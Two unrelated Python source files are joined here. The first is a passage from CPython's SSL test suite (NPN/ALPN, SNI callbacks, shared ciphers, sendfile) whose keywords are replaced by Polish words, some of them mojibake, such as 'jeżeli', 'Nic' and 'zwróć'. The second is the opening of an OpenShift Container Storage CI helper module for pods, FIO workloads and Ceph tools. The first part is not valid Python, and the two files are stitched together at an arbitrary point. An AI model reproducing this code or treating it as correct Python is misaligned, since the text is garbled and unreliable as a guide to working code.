server_result = stats['server_alpn_protocols'][-1] \
jeลผeli len(stats['server_alpn_protocols']) inaczej 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() jest Nic unless NPN jest used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['client_npn_protocol'], Nic)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed dla this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
dla client_protocols, expected w protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=Prawda, connectionchatty=Prawda)
msg = "failed trying %s (s) oraz %s (c).\n" \
"was expecting %s, but got %%s z the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
jeลผeli len(stats['server_npn_protocols']) inaczej 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
zwrรณฤ server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
jeลผeli server_name jest nie Nic:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=Prawda,
sni_name='supermessage')
# The hostname was fetched properly, oraz the certificate was
# changed dla the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback jest called przy server_name=Nic
stats = server_params_test(client_context, server_context,
chatty=Prawda,
sni_name=Nic)
self.assertEqual(calls, [(Nic, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(Nic)
stats = server_params_test(client_context, server_context,
chatty=Prawda,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert jest reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
zwrรณฤ ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
przy self.assertRaises(ssl.SSLError) jako cm:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection przy a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
przy self.assertRaises(ssl.SSLError) jako cm, \
support.captured_stderr() jako stderr:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong zwrรณฤ type terminates the TLS connection
# przy an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
zwrรณฤ "foo"
server_context.set_servername_callback(cb_wrong_return_type)
przy self.assertRaises(ssl.SSLError) jako cm, \
support.captured_stderr() jako stderr:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers("RC4")
server_context.set_ciphers("AES:RC4")
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
dla name, tls_version, bits w ciphers:
self.assertIn("RC4", name.split("-"))
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=Nieprawda)
przy server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
przy open(support.TESTFN, 'wb') jako f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=Nieprawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
przy open(support.TESTFN, 'rb') jako file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=Nieprawda):
jeลผeli support.verbose:
zaimportuj warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
przy warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
'dist\(\) oraz linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
dla name, func w plats.items():
plat = func()
jeลผeli plat oraz plat[0]:
plat = '%s %r' % (name, plat)
przerwij
inaczej:
plat = repr(platform.platform())
print("test_ssl: testing przy %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
sprรณbuj:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
wyjฤ
wszy AttributeError:
dalej
dla filename w [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
jeลผeli nie os.path.exists(filename):
podnieล support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
jeลผeli support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
jeลผeli _have_threads:
thread_info = support.threading_setup()
jeลผeli thread_info:
tests.append(ThreadedTests)
sprรณbuj:
support.run_unittest(*tests)
w_koลcu:
jeลผeli _have_threads:
support.threading_cleanup(*thread_info)
jeลผeli __name__ == "__main__":
test_main()
|
pod.py | """
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from semantic_version import Version
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from ocs_ci.helpers import helpers
from ocs_ci.helpers.proxy import update_container_with_proxy_env
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed,
NonUpgradedImagesFoundError,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableResourceException,
ResourceNotFoundError,
)
from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.job import get_job_obj, get_jobs_with_prefix
from ocs_ci.utility import templating
from ocs_ci.utility.utils import (
run_cmd,
check_timeout_reached,
TimeoutSampler,
get_ocp_version,
)
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)
FIO_TIMEOUT = 600
TEXT_CONTENT = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
"sed do eiusmod tempor incididunt ut labore et dolore magna "
"aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
"ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit "
"esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
"occaecat cupidatat non proident, sunt in culpa qui officia "
"deserunt mollit anim id est laborum."
)
TEST_FILE = "/var/lib/www/html/test"
FEDORA_TEST_FILE = "/mnt/test"
class Pod(OCS):
"""
Handles per pod related context
"""
def __init__(self, **kwargs):
"""
Initializer function
kwargs:
Copy of ocs/defaults.py::<some pod> dictionary
"""
self.pod_data = kwargs
# configure http[s]_proxy env variable, if applicable
update_container_with_proxy_env(self.pod_data)
super(Pod, self).__init__(**kwargs)
with tempfile.NamedTemporaryFile(
mode="w+", prefix="POD_", delete=False
) as temp_info:
self.temp_yaml = temp_info.name
self._name = self.pod_data.get("metadata").get("name")
self._labels = self.get_labels()
self._roles = []
self.ocp = OCP(
api_version=defaults.API_VERSION,
kind=constants.POD,
namespace=self.namespace,
)
self.fio_thread = None
# TODO: get backend config !!
self.wl_obj = None
self.wl_setup_done = False
@property
def name(self):
return self._name
@property
def namespace(self):
return self._namespace
@property
def roles(self):
return self._roles
@property
def labels(self):
return self._labels
@property
def restart_count(self):
return self.get().get("status").get("containerStatuses")[0].get("restartCount")
def __setattr__(self, key, val):
self.__dict__[key] = val
def add_role(self, role):
"""
Adds a new role for this pod
Args:
role (str): New role to be assigned for this pod
"""
self._roles.append(role)
def get_fio_results(self, timeout=FIO_TIMEOUT):
"""
Get FIO execution results
Returns:
dict: Dictionary represents the FIO execution results
Raises:
Exception: In case of exception from FIO
"""
logger.info(f"Waiting for FIO results from pod {self.name}")
try:
result = self.fio_thread.result(timeout)
if result:
return yaml.safe_load(result)
raise CommandFailed(f"FIO execution results: {result}.")
except CommandFailed as ex:
logger.exception(f"FIO failed: {ex}")
raise
except Exception as ex:
logger.exception(f"Found Exception: {ex}")
raise
def exec_cmd_on_pod(
self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
"""
Execute a command on a pod (e.g. oc rsh)
Args:
command (str): The command to execute on the given pod
out_yaml_format (bool): whether to return yaml loaded python
object OR to return raw output
secrets (list): A list of secrets to be masked with asterisks
This kwarg is popped in order to not interfere with
subprocess.run(``**kwargs``)
timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds
Returns:
Munch Obj: This object represents a returned yaml file
"""
rsh_cmd = f"rsh {self.name} "
rsh_cmd += command
return self.ocp.exec_oc_cmd(
rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
)
def exec_s3_cmd_on_pod(self, command, mcg_obj=None):
"""
Execute an S3 command on a pod
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials
command (str): The command to execute on the given pod
Returns:
Munch Obj: This object represents a returned yaml file
"""
return self.exec_cmd_on_pod(
craft_s3_command(command, mcg_obj),
out_yaml_format=False,
secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint]
if mcg_obj
else None,
)
def exec_sh_cmd_on_pod(self, command, sh="bash"):
"""
Execute a pure bash command on a pod via oc exec where you can use
bash syntaxt like &&, ||, ;, for loop and so on.
Args:
command (str): The command to execute on the given pod
Returns:
str: stdout of the command
"""
cmd = f'exec {self.name} -- {sh} -c "{command}"'
return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False)
def get_labels(self):
"""
Get labels from pod
Raises:
NotFoundError: If resource not found
Returns:
dict: All the openshift labels on a given pod
"""
return self.pod_data.get("metadata").get("labels")
def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"):
"""
Execute a Ceph command on the Ceph tools pod
Args:
ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
format (str): The returning output format of the Ceph command
Returns:
dict: Ceph command output
Raises:
CommandFailed: In case the pod is not a toolbox pod
"""
if "rook-ceph-tools" not in self.labels.values():
raise CommandFailed("Ceph commands can be executed only on toolbox pod")
ceph_cmd = ceph_cmd
if format:
ceph_cmd += f" --format {format}"
out = self.exec_cmd_on_pod(ceph_cmd)
# For some commands, like "ceph fs ls", the returned output is a list
if isinstance(out, list):
return [item for item in out if item]
return out
def get_storage_path(self, storage_type="fs"):
"""
Get the pod volume mount path or device path
Returns:
str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs
else device path of raw block pv
"""
# TODO: Allow returning a path of a specified volume of a specified
# container
if storage_type == "block":
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeDevices")[0]
.get("devicePath")
)
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
def workload_setup(self, storage_type, jobs=1):
"""
Do setup on pod for running FIO
Args:
storage_type (str): 'fs' or 'block'
jobs (int): Number of jobs to execute FIO
"""
work_load = "fio"
name = f"test_workload_{work_load}"
path = self.get_storage_path(storage_type)
# few io parameters for Fio
self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs)
assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
self.wl_setup_done = True
def run_io(
self,
storage_type,
size,
io_direction="rw",
rw_ratio=75,
jobs=1,
runtime=60,
depth=4,
rate="1m",
rate_process="poisson",
fio_filename=None,
bs="4K",
end_fsync=0,
invalidate=None,
):
"""
Execute FIO on a pod
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
storage_type (str): 'fs' or 'block'
size (str): Size in MB, e.g. '200M'
io_direction (str): Determines the operation:
'ro', 'wo', 'rw' (default: 'rw')
rw_ratio (int): Determines the reads and writes using a
<rw_ratio>%/100-<rw_ratio>%
(e.g. the default is 75 which means it is 75%/25% which
equivalent to 3 reads are performed for every 1 write)
jobs (int): Number of jobs to execute FIO
runtime (int): Number of seconds IO should run for
depth (int): IO depth
rate (str): rate of IO default 1m, e.g. 16k
rate_process (str): kind of rate process default poisson, e.g. poisson
fio_filename(str): Name of fio file created on app pod's mount point
bs (str): Block size, e.g. 4K
end_fsync (int): If 1, fio will sync file contents when a write
stage has completed. Fio default is 0
invalidate (bool): Invalidate the buffer/page cache parts of the files to be used prior to starting I/O
"""
if not self.wl_setup_done:
self.workload_setup(storage_type=storage_type, jobs=jobs)
if io_direction == "rw":
self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML)
self.io_params["rwmixread"] = rw_ratio
else:
self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML)
if invalidate is not None:
self.io_params["invalidate"] = invalidate
self.io_params["runtime"] = runtime
size = size if isinstance(size, str) else f"{size}G"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.io_params["iodepth"] = depth
self.io_params["rate"] = rate
self.io_params["rate_process"] = rate_process
self.io_params["bs"] = bs
if end_fsync:
self.io_params["end_fsync"] = end_fsync
self.fio_thread = self.wl_obj.run(**self.io_params)
def fillup_fs(self, size, fio_filename=None):
"""
Execute FIO on a pod to fillup a file
This will run sequantial IO of 1MB block size to fill up the fill with data
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
size (str): Size in MB, e.g. '200M'
fio_filename(str): Name of fio file created on app pod's mount point
"""
if not self.wl_setup_done:
self.workload_setup(storage_type="fs", jobs=1)
self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML)
size = size if isinstance(size, str) else f"{size}M"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.fio_thread = self.wl_obj.run(**self.io_params)
def run_git_clone(self, skip_install=True):
"""
Execute git clone on a pod to simulate a Jenkins user
Args:
skip_install (bool): By default True, skips git package
installation in pod
"""
name = "test_workload"
work_load = "jenkins"
wl = workload.WorkLoad(
name=name, work_load=work_load, pod=self, path=self.get_storage_path()
)
if not skip_install:
assert wl.setup(), "Setup for git failed"
wl.run()
def install_packages(self, packages):
"""
Install packages in a Pod
Args:
packages (list): List of packages to install
"""
if isinstance(packages, list):
packages = " ".join(packages)
cmd = f"yum install {packages} -y"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
"""
Upload a file from pod to server
Args:
server (str): Name of the server to upload
authkey (str): Authentication file (.pem file)
localpath (str): Local file/dir in pod to upload
remotepath (str): Target path on the remote server
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = (
f'scp -i {authkey} -o "StrictHostKeyChecking no"'
f" -r {localpath} {user}@{server}:{remotepath}"
)
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
"""
Run command on a remote server from pod
Args:
server (str): Name of the server to run the command
authkey (str): Authentication file (.pem file)
cmd (str): command to run on server from pod
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}'
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def get_memory(self, container_name):
"""
Get the pod memory size
Args:
container_name (str): The name of the container to look for
Returns:
str: The container memory size (e.g. '5Gi')
"""
pod_containers = self.pod_data.get("spec").get("containers")
matched_containers = [
c for c in pod_containers if c.get("name") == container_name
]
if len(matched_containers) > 1:
logger.error(
f"Multiple containers, of the same name, were found: {[c.get('name') for c in matched_containers]}"
)
container = matched_containers[0]
return container.get("resources").get("limits").get("memory")
def get_node(self):
"""
Gets the node name
Returns:
str: Node name
"""
if config.ENV_DATA.get(
"platform", ""
).lower() == "aws" and config.DEPLOYMENT.get("local_storage"):
return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"]
else:
return self.pod_data["spec"]["nodeName"]
# Helper functions for Pods
def get_all_pods(
namespace=None,
selector=None,
selector_label="app",
exclude_selector=False,
wait=False,
):
"""
Get all pods in a namespace.
Args:
namespace (str): Name of the namespace
If namespace is None - get all pods
selector (list) : List of the resource selector to search with.
Example: ['alertmanager','prometheus']
selector_label (str): Label of selector (default: app).
exclude_selector (bool): If list of the resource selector not to search with
Returns:
list: List of Pod objects
"""
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
# In case of >4 worker nodes node failures automatic failover of pods to
# other nodes will happen.
# So, we are waiting for the pods to come up on new node
if wait:
wait_time = 180
logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
time.sleep(wait_time)
pods = ocp_pod_obj.get()["items"]
if selector:
if exclude_selector:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) not in selector
]
else:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) in selector
]
pods = pods_new
pod_objs = [Pod(**pod) for pod in pods]
return pod_objs
def get_ceph_tools_pod():
"""
Get the Ceph tools pod
Returns:
Pod object: The Ceph tools pod object
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
if not ct_pod_items:
# setup ceph_toolbox pod if the cluster has been setup by some other CI
setup_ceph_toolbox()
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
assert ct_pod_items, "No Ceph tools pod found"
# In the case of node failure, the CT pod will be recreated with the old
# one in status Terminated. Therefore, need to filter out the Terminated pod
running_ct_pods = list()
for pod in ct_pod_items:
if (
ocp_pod_obj.get_resource_status(pod.get("metadata").get("name"))
== constants.STATUS_RUNNING
):
running_ct_pods.append(pod)
assert running_ct_pods, "No running Ceph tools pod found"
ceph_pod = Pod(**running_ct_pods[0])
return ceph_pod
def get_csi_provisioner_pod(interface):
"""
Get the provisioner pod based on interface
Returns:
Pod object: The provisioner pod object based on iterface
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
selector = (
"app=csi-rbdplugin-provisioner"
if (
interface == constants.CEPHBLOCKPOOL
or interface == constants.CEPHBLOCKPOOL_THICK
)
else "app=csi-cephfsplugin-provisioner"
)
provision_pod_items = ocp_pod_obj.get(selector=selector)["items"]
assert provision_pod_items, f"No {interface} provisioner pod found"
provisioner_pod = (
Pod(**provision_pod_items[0]).name,
Pod(**provision_pod_items[1]).name,
)
return provisioner_pod
def get_csi_snapshoter_pod():
"""
Get the csi snapshot controller pod
Returns:
Pod object: csi snapshot controller pod
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace="openshift-cluster-storage-operator"
)
selector = "app=csi-snapshot-controller"
snapshotner_pod = ocp_pod_obj.get(selector=selector)["items"]
snapshotner_pod = Pod(**snapshotner_pod[0]).name
return snapshotner_pod
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
rgw_label (str): label associated with rgw pods
(default: defaults.RGW_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
list: Pod objects of rgw pods
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
rgws = get_pods_having_label(rgw_label, namespace)
return [Pod(**rgw) for rgw in rgws]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
ocs_label (str): label associated with ocs_operator pod
(default: defaults.OCS_OPERATOR_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
Pod object: ocs_operator pod object
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
ocs_operator = get_pods_having_label(ocs_label, namespace)
ocs_operator_pod = Pod(**ocs_operator[0])
return ocs_operator_pod
def list_ceph_images(pool_name="rbd"):
"""
Args:
pool_name (str): Name of the pool to get the ceph images
Returns (List): List of RBD images in the pool
"""
ct_pod = get_ceph_tools_pod()
return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json")
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
"""
Check if file exists inside the pod
Args:
pod_obj (Pod): The object of the pod
file_path (str): The full path of the file to look for inside
the pod
Returns:
bool: True if the file exist, False otherwise
"""
try:
check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
except CommandFailed:
pod_obj.install_packages("findutils")
ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"')
if re.search(file_path, ret):
return True
return False
def get_file_path(pod_obj, file_name):
"""
Get the full path of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which path to get
Returns:
str: The full path of the file
"""
path = (
pod_obj.get()
.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
file_path = os.path.join(path, file_name)
return file_path
def cal_md5sum(pod_obj, file_name, block=False):
"""
Calculates the md5sum of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
str: The md5sum of the file
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
command=f'bash -c "md5sum {file_path}"', out_yaml_format=False
)
md5sum = md5sum_cmd_out.split()[0]
logger.info(f"md5sum of file {file_name}: {md5sum}")
return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False):
"""
Verifies existence and md5sum of file created from first pod
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
original_md5sum (str): The original md5sum of the file
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
bool: True if the file exists and md5sum matches
Raises:
AssertionError: If file doesn't exist or md5sum mismatch
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exists"
current_md5sum = cal_md5sum(pod_obj, file_name, block)
logger.info(f"Original md5sum of file: {original_md5sum}")
logger.info(f"Current md5sum of file: {current_md5sum}")
assert current_md5sum == original_md5sum, "Data corruption found"
logger.info(f"File {file_name} exists and md5sum matches")
return True
def get_fio_rw_iops(pod_obj):
"""
Execute FIO on a pod
Args:
pod_obj (Pod): The object of the pod
"""
fio_result = pod_obj.get_fio_results()
logging.info(f"FIO output: {fio_result}")
logging.info("IOPs after FIO:")
logging.info(f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}")
logging.info(f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}")
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
"""
Run I/O in the background
Args:
pod_obj (Pod): The object of the pod
expect_to_fail (bool): True for the command to be expected to fail
(disruptive operations), False otherwise
fedora_dc (bool): set to False by default. If set to True, it runs IO in
background on a fedora dc pod.
Returns:
Thread: A thread of the I/O execution
"""
logger.info(f"Running I/O on pod {pod_obj.name}")
def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
"""
Execute I/O
"""
try:
# Writing content to a new file every 0.01 seconds.
# Without sleep, the device will run out of space very quickly -
# 5-10 seconds for a 5GB device
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
pod_obj.exec_cmd_on_pod(
command=f'bash -c "let i=0; while true; do echo '
f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"',
timeout=2400,
)
# Once the pod gets deleted, the I/O execution will get terminated.
# Hence, catching this exception
except CommandFailed as ex:
if expect_to_fail:
if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))):
logger.info("I/O command got terminated as expected")
return
raise ex
thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
thread.start()
time.sleep(2)
# Checking file existence
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
test_file = FILE + "1"
# Check I/O started
try:
for sample in TimeoutSampler(
timeout=20,
sleep=1,
func=check_file_existence,
pod_obj=pod_obj,
file_path=test_file,
):
if sample:
break
logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
except TimeoutExpiredError:
logger.error(
f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
"Collect file list."
)
parent_dir = os.path.join(TEST_FILE, os.pardir)
pod_obj.exec_cmd_on_pod(
command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False
)
raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
return thread
def get_admin_key_from_ceph_tools():
"""
Fetches admin key secret from ceph
Returns:
admin keyring encoded with base64 as a string
"""
tools_pod = get_ceph_tools_pod()
out = tools_pod.exec_ceph_cmd(ceph_cmd="ceph auth get-key client.admin")
base64_output = base64.b64encode(out["key"].encode()).decode()
return base64_output
def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"):
"""
Run I/O on mount point
Args:
pod_obj (Pod): The object of the pod
bs (str): Read and write up to bytes at a time
count (str): Copy only N input blocks
Returns:
used_percentage (str): Used percentage on mount point
"""
pod_obj.exec_cmd_on_pod(
command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
)
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index("/var/lib/www/html") - 1]
return used_percentage
def get_pods_having_label(label, namespace):
"""
Fetches pod resources with given label in given namespace
Args:
label (str): label which pods might have
namespace (str): Namespace in which to be looked up
Return:
list: of pods info
"""
ocp_pod = OCP(kind=constants.POD, namespace=namespace)
pods = ocp_pod.get(selector=label).get("items")
return pods
def get_deployments_having_label(label, namespace):
"""
Fetches deployment resources with given label in given namespace
Args:
label (str): label which deployments might have
namespace (str): Namespace in which to be looked up
Return:
list: deployment OCP instances
"""
ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
pods = ocp_deployment.get(selector=label).get("items")
return pods
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
"""
Fetches info about mds pods in the cluster
Args:
mds_label (str): label associated with mds pods
(default: defaults.MDS_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mds pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
